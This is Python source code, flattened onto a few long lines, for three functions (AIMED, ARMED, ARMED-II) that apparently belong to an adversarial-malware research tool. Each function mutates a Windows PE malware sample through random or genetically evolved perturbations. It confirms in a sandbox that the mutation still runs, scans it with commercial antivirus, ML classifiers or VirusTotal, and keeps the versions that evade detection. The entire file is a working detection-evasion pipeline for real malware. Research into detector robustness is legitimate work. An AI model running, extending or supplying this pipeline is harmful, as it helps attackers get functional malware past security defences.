def aimed(bin_bytes, sample, size_population, length_sequence, files_expected, scanner): ''' AIMED: Automatic Intelligent Malware Modifications to Evade Detection This function implements GP to find PE adversarial examples. Input: bin_bytes: binaries from input malware sample sample: malware sample in terminal size_population: population size for GP (Default: 4) length_sequence: length of perturbation sequence files_expected: number of malware mutations expected as output scanner: commercial AV or malware model classifier ''' # Create a dict with all perturbations actions = f.actions_vector(m.ACTION_TABLE.keys()) # Inject children sequences to S to create four S' mutation = {} mutation['Malware_Bytes'], mutation['Malware_Sample'], mutation['Actions'], \ mutation['Files_Expected'], mutation['hash_sample'], mutation['Scanner']= \ bin_bytes, sample, actions, files_expected, f.hash_files(sample), scanner # Call evolution algorithm to find successfull mutations print( '\n### AIMED: Automatic Intelligent Malware Modifications to Evade Detection ###' ) population = gp.Population(size=size_population, length_sequence=length_sequence, show_sequences=True) return population.generation(mutation=mutation)
def armed2(bin_bytes, sample, n, rounds, files_expected, scanner): ''' ARMED-II: Automatic Random Malware Modifications to Evade Detection -- Incremental Iterations This function injects random perturbations sequentially to input PE malware in order to find adversarial examples. After each injection, the malware mutation will be tested for functionality and evasion. Input: bin_bytes: binaries from input malware sample sample: malware sample in terminal n: number of perturbations to inject rounds: number of rounds to run when searching for evasions files_expected: number of malware mutations expected as output scanner: commercial AV or malware model classifier ''' # Create a dict with all perturbations actions = f.actions_vector(m.ACTION_TABLE.keys()) # Get VT detections for original sample to use as benchmark hash_sample = f.hash_files(sample) sample_report = f.get_report_VT(hash_sample, rescan=False) #sample_report = {'positives': 49, 'total': 66} # Debug mode (without VT/offline) # Inject perturbations and check for detection chosen_actions = [None] * n new_mutations = 0 for x in range(n): for r in range(rounds): # Create random action and add it to sequence random_actions = f.create_random_actions(actions, x + 1) chosen_actions[x] = random_actions[0] print( '\n### ARMED-II: Automatic Random Malware Modifications to Evade Detection ###\n' ) print('# Manipulation Box # Round {} # Perturbation {} of {} #\n'. format(r + 1, x + 1, n)) # Call a recursive function to inject x perturbations on a given sample (Print = Perturbation: x+1) mod_sample = f.rec_mod_files(bin_bytes, actions, chosen_actions, x, x + 1) print('\n# Sandbox (Oracle) # Round {} # Perturbation {} of {} #'. format(r + 1, x + 1, n)) # Send the modified sample to sandbox to check functionality (not corrupt) json_send = f.send_local_sandbox(mod_sample) # Calculate hashes from original and modified sample mod_sample_hash = f.hash_files(mod_sample) # Collect info to writeCSV function CSV = f.collect_info_CSV(sample, sample_report, x, chosen_actions, mod_sample_hash, hash_sample) # Malware analysis & malware detection stages useVT = False funcional = False funcional, url_sandbox = malware_analysis(mod_sample, json_send, useVT, CSV) # Increase number of mutations to match -m given based on local checks if funcional: print( '# Malware Classifier # Round {} # Perturbation {} of {} #\n' .format(r + 1, int(CSV['Perturbations']), n)) #Check if mutations is detected start = time() mutation = CSV['Perturbations'] + '_m.exe' print('Running detection for:', mutation) detected = malware_detection(mutation, scanner) new_mutations += save_file_database(detected, mutation, url_sandbox, CSV, scanner) if new_mutations == files_expected: break # Show time print('Evasive mutations found: {}'.format(new_mutations))
def armed(bin_bytes, sample, n, rounds, files_expected, detection_threshold, scanner): ''' ARMED: Automatic Random Malware Modifications to Evade Detection This function injects n random perturbations to input PE malware in order to find adversarial examples. Input: bin_bytes: binaries from input malware sample sample: malware sample in terminal n: number of perturbations to inject rounds: number of rounds to run when searching for evasions files_expected: number of malware mutations expected as output detection_threshold: run until number of detections is below threshold (only for VirusTotal) scanner: commercial AV or malware model classifier ''' # Decide whether to use remote (VirusTotal) or local detection & remote or local sandbox useVT = False useHA = False # Iterate to generate -m mutations for all perturbations on the loop start = time() max_number_perts = n while n <= max_number_perts: new_samples = 0 new_corrupt_samples = 0 for r in range(rounds): # Create a dict with all perturbations & choose random actions actions = f.actions_vector(m.ACTION_TABLE.keys()) chosen_actions = f.create_random_actions(actions, n) # Call a recursive function to inject n perturbations on a given sample print( '\n### ARMED: Automatic Random Malware Modifications to Evade Detection ###\n' ) print('# Manipulation Box # Round {} of {} #\n'.format( r + 1, rounds)) perturbs = n - 1 start_pert = time() mod_sample = f.rec_mod_files(bin_bytes, actions, chosen_actions, perturbs, n) print('Time injecting perturbations: {} s'.format( round(time() - start_pert, 2))) # Send the modified sample to sandbox to check functionality (not corrupt) print('\n# Sandbox (Oracle) # Round {} of {} #'.format( r + 1, rounds)) # Check if use remote or local sandbox if useHA: json_send_HA = f.send_HA(mod_sample, 120) else: json_send = f.send_local_sandbox(mod_sample) # Calculate hashes from original and modified sample hash_sample = f.hash_files(sample) mod_sample_hash = f.hash_files(mod_sample) # Get VT detections for original sample to use as benchmark sample_report = f.get_report_VT(hash_sample, rescan=False) #sample_report = {'positives': 49, 'total': 66} # Debug mode (without VT/offline) # Collect info to writeCSV function CSV = f.collect_info_CSV(sample, sample_report, n - 1, chosen_actions, mod_sample_hash, hash_sample) # Malware analysis & malware detection stages funcional = False funcional, url_sandbox = malware_analysis(mod_sample, json_send, useVT, CSV) # Check if use remote or local detection along with functionality if useVT and funcional: new_samples += 1 CSV['Full_Analysis_Report'] = url_sandbox vt_positives = malware_detection_VT(sample_report, CSV) if vt_positives < detection_threshold: break elif not useVT and funcional: print( '# Malware Classifier # Round {} # Perturbation {} of {} #\n' .format(r + 1, int(CSV['Perturbations']), n)) # Check if mutation is detected start = time() mutation = CSV['Perturbations'] + '_m.exe' print('Running detection for:', mutation) detected = malware_detection(mutation, scanner) new_samples += save_file_database(detected, mutation, url_sandbox, CSV, scanner) elif not funcional: new_corrupt_samples += 1 if r == rounds - 1: print('\n## Summary ##') if new_samples == files_expected: break print('Evasive mutations found: {}'.format(new_samples)) print('Corrupt mutations found: {}'.format(new_corrupt_samples)) n += 1 return new_samples, new_corrupt_samples